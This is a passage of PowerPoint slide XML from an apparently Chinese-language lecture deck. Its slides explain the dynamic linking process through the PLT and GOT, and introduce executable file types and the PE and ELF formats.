            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A11C1FDF-459D-4272-B9C8-1F81E9B68EDE}"/>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动态链接过程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9" name="Shape 929"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Shape 930"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931" name="Shape 931"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="932" name="Shape 932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="933" name="Shape 933"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934" name="Shape 934"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="935" name="Shape 935"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="936" name="Shape 936"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Shape 937"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Shape 938"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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939" name="Shape 939"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="940" name="Shape 940"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="941" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10DBFBC0-7C17-405F-8CE1-4F8E618FA438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="3754618" cy="646331"/>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跳转到 </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plt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头部</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为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</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函数传参</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B22BB0E-D4A6-4F57-B09D-D6F516EB7048}"/>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动态链接过程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8" name="Shape 948"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Shape 949"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="950" name="Shape 950"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="951" name="Shape 951"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="952" name="Shape 952"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="953" name="Shape 953"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="999999"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="999999"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Shape 954"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="955" name="Shape 955"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="956" name="Shape 956"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="Shape 957"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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958" name="Shape 958"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="959" name="Shape 959"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="960" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C5040D4-9F54-4527-BBEC-B7656F64A15D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="3754618" cy="646331"/>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跳转到 </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plt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头部</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为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</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函数传参</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AC477A-0898-4657-AC9D-3B230167A3C7}"/>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动态链接过程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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614063" y="2541113"/>
            <a:ext cx="2954655"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什么是可执行文件？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65C167BE-6CF8-47B7-BDF6-E128CAF75988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254623" y="3070530"/>
            <a:ext cx="4628190" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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广义：文件中的数据是可执行代码的文件</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.out</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.exe</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sh</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py</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狭义：文件中的数据是机器码的文件</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.out</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.exe</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dll</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.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDA3F7BE-97E2-45EB-96FD-D6038C425E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1382015"/>
            <a:ext cx="2646878"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可执行文件的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC635983-05CE-49B3-B85F-BFC62741F972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6736560" y="1911432"/>
            <a:ext cx="5194051" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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Windows</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PE</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Portable Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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可执行程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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动态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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dll</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静态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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.lib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Executable and Linkable Format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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可执行程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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.out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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动态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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静态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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.a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
